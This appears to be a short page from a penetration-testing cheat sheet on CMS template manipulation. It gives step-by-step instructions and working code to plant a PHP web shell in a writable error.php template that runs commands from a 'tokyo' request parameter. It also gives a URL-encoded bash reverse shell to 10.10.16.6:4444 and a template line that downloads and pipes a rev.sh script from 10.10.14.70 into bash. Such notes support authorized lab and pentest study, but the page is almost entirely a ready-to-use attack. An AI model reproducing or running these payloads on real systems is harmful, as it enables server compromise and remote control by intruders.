Template Manipulation

PHP

  • Navigate to site templates

  • Look for writable files (Normally error.php is a good one to look at)

  • Add this code at the beginning of the file:

if (isset($_REQUEST['tokyo'])) {
  system($_REQUEST['tokyo']);
  die();
}

  • Visiting a page that doesn't exist will raise a error page, if the argument passed is tokyo, it will be run with system ; allowing to code execution:

/nonexistentsite?tokyo=id

  • From here you can spawn a reverse shell by passing it as an argument:

bash+-c+'bash+-i+>%26+/dev/tcp/10.10.16.6/4444+0>%261'

  • Alternatively, you can write the reverse shell directly on the template:

<?php system("curl 10.10.14.70:8080/rev.sh|bash"); ?>

  • Then, create rev.sh 

echo -e '#!/bin/bash\nsh -i >& /dev/tcp/10.10.14.70/4444 0>&1' > rev.sh

  • Setup a python web server, get your listener ready and trigger the error.php

PreviousEval InjectionNextPath Traversal

Last updated